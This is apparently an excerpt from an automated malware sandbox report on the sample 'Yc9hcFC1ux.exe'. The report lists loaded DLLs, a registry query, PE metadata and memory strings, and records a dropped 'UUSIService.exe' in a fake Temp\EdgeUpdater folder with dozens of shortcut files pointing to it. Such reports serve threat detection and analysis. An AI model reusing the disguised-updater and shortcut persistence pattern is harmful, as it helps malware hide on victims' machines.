Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Section loaded: cryptbase.dll

Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32

Jump to behavior

Source: UUSIService_9cd4d46bd3c344a5a3b57427edc04e3a.lnk.0.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_32058ea4d4fa48949bcaf876cf454efa.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_544d4f2bbc46454092f403239135762f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_7a15022c8bfb48c3b738aad3ece2b578.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_4dbf829e39474c98829bba8ff6e9ad45.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3b0b2fd724544d12b75c23f650bcee90.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e6416737b21b48a9894f7b49e7550b71.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_00b9f3e5a01d41f3b6dd1f946a0c3058.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_334d1e4253554d3d911b202da266b12b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_a70151abc03140619fc377a02390a2ba.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e4a26e83483f46279dce2ec0377d0587.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_0d538cad12064978af5a3268dc5d559e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_fa81cc20db9049868ae7912824615f1b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_6d32a083e4f54b468efef75cad3ace29.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_d3145aa6b3734b18871d6250fe6aa172.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c355178b7b7f40a1947b66c7cd8f0d74.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_906d1686ddbf4967b46575de2621d86d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_225b3b92b5ed431a998b13aa9f182277.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_485d34a5b03c48c7a76fefa3f90426a3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2615dcf28a8f4e5fa5a8ed2977c478b6.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_ff13f93ecae54136a80bee031bd9011e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_1fea5c584df64a41b9220675ab62d7f9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2d4ce600d8f14273917139d8018be8d3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_113088e5c96340fe9fe76c1c18993310.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_26308272c30649dda16740d38c231251.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3f8a5e91d5d944b1b88a5ca92635f511.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_8e2b9cb806034df8ad8ff6173a35ed5e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_15c7869d6b034fb18c8267be118b1866.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_7705285cf70f4826bbb43e55901766c4.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e892251fda954bb5b9ddb3d046567a8a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\EdgeUpdaters.exe
Source: UUSIService_41b8b9f6092a43418819142050387373.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_10bf0fe91b1c43a78fc3b7a61f2231c5.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_340cbc2e44fd4c878aa92e140d64a0f8.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3c8ff22d03ed4179806dba08f699cae9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_a17d5cfeb5ef442da8c2a20bed8d9d8f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_8c19d81d27cf49499645d8fde1085e62.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b4e89d62b6314802b698f778719c4e41.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2d3e067308c543f995db2c5843e9efb5.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_40a8296880184f1397aaa52465a9ca80.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_a3d43ce0cbc14e6199a53576fc8dc769.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c84fd3944e1a46079a937b9018946b61.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_1fa187bbc2874f1487c5057329c50e63.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_7df32232a441418d80f94208b11e795c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_df6b6271267e439c98dbfac211279850.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b4e939a622f340eea3400b8bdbfc86f2.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_59312de00bf7418e92db32d12b986b9d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_5170c447d16a4c4dbdcebc509470a9cd.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2d86e4edceea415eb423d83d970e086d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_4c566573618a4121a02b11bb805215a7.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_03e67ecb722e426e86245d879a8c4969.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2b3f065df93c4401905a03aa3de62b5b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2f79f0adcf954e24a21fdda9ce0da31e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_fea9c32cf061495787bf3801120df355.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_bcbe81260e294175b6144b9088d204e9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_092cc48615f64d8eaf2ddae2ed7815c6.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_fb44e82f4f5e4531b4172029272f087a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_93aafa93c43d46bf8c06e5b52dfb5edb.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_cf6e768d83504551ae0a5cebe22a6e8d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e0a50b3275ac4904945f226a45d7c33e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_12f45bea53024d9d8c00badd69f29523.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2c5ed3257a9c494aaa8a9b3a9d7bd542.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_63069add25714d9da3a8b41cf36ac0a6.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_cf2ee3df532d40ce84524d91d76ef01d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b798218a8d5c440bb17c1a50108ec71b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_90b3c86715ff47d8811cac966375b65f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_f2ea87e99e2943ffad3d0eb01596b467.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b43de8fdaedd43b9afe7708cdd752d2c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_00774d3b45e04f12abc622ce376c40af.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_cb59e031b1c64307ba171c4ec71031e6.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_ff1130bea1ca4cbba936ff475f6f4c49.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b4a93417345144c0b1024fbce655098b.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_68353cd852cf4c8291d2879f1ca2e017.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c3f1eba03716492eb11b6423860b4f68.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c3dbe5644a5b4d48b1fb6491c311eced.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_7913b0527f3d4235b6ceb5c4130d80dd.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b4a40f23d119492b9c36293469b7816f.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2dcb319cf8274129a78b921238fe7cb3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_6222ebb440bb43c7b9c768da3af11750.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_6a9254444906492c8c8f284624ca1f37.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_4e640fe239e64907858c8d5be31e6598.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c87d02d482fb4ca596a2fcc5e82e665e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_47e6f15250e14047992326a53b97b7e2.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3aae43b4e9a4468ba0c83637938945e1.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_322055c8dd1d432b9ada39f6723b4851.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_1fee30c3ec7e4c77948efd5a4192bb7c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_fbbb4b72220c46fb93732c2a706405ab.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c21e90becac149bc9e247673ad530369.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_cd1906435c8a4f349e226615398c886c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_905bba77717b4267976905fa6260424d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_d688a1f8ca524c3fb3a2e04be22b53c2.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_474eee5cd4b34cb8b74ac6d25e0dfed3.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_be6a07612abb41949afd68049a21708e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_73fea31bd5b5428c9bc006be19364534.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_d89d93ad90584b91ae549a36acedc2b1.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_77cb5acc7ba34c11b7f17e5b7c3649d7.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_73f188d324004f71bb8d2d5f0076f049.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_d14c8ce632cd47cf81d96e8c1fc7bc42.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_70c3b1e53cb04dfab6f97eb43615a240.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3985638be9e1402f84ea1f5d23887334.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_39988a9fa9b649bfa247210055ff49cf.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_54cf3eddcc384ce0bcfe40ada528f9c7.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_8074e68c47104af2bbfd9be7bd9b39ba.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_711b254958554f49b23c601b912e6740.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_8a66772f7aad4e4fae9a833c748bc8a0.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_b57470c38d394fa8867c44498ed71109.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_29bc430ad8424be3a41e66ed515dc99c.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_f827da91bc664cdc9ece459a3d1c468a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_f36dc9efa98a4e41aa28ba7a861ca173.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_fe8e200076cc49cdb8a438b434fa52d9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_1a113a4199bf4054a4adc218255c32a0.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_2766c11f47fe496a9c32a4f4d3b0e72d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_7d6df955870e47a68bf114653e48363d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e5f04cf0df234c0aab8a48e6f7813fa9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c6015a8a9597483d8296fda05e0c6cea.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_14f5035470644de6885cf4a339dafe4a.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_f6ba4aa9c38840bcb1dc8c1cd1b1a57d.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_3a48f3b62fd54fe39f0e27b52202af84.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c59d4cba3ad84ff7a7f949314e21efd4.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_e9fb1908f1054881b6ffc228f98a913e.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_955a0ab24a744d3bba6d4b99fa7724f9.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe
Source: UUSIService_c2ebe0361535455e8788ff8a6bc522ba.lnk.2.dr	LNK file: ..\..\..\..\..\..\Local\Temp\EdgeUpdater\UUSIService.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Yc9hcFC1ux.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Yc9hcFC1ux.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb$a source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP<o0C:\Windows\mscorlib.pdb source: UUSIService.exe, 00000013.00000002.2639029055.00000000006F8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2931976658.00000000006F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb< source: WERC536.tmp.dmp.18.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb7 source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.ni.dll source: WERC536.tmp.dmp.18.dr
Source:	Binary string: 00000000000000000400000000000000e.pdbs source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdbE source: UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb"J1 source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbh source: WERC536.tmp.dmp.18.dr
Source:	Binary string: b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 0000001F.00000002.3226748776.0000000000BC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbff source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb`}e0* source: WER7001.tmp.dmp.13.dr
Source:	Binary string: 00000000000000000400000000000000e.pdbp source: UUSIService.exe, 0000001C.00000002.3154542106.000000000103D000.00000004.00000020.00020000.00000000.sdmp
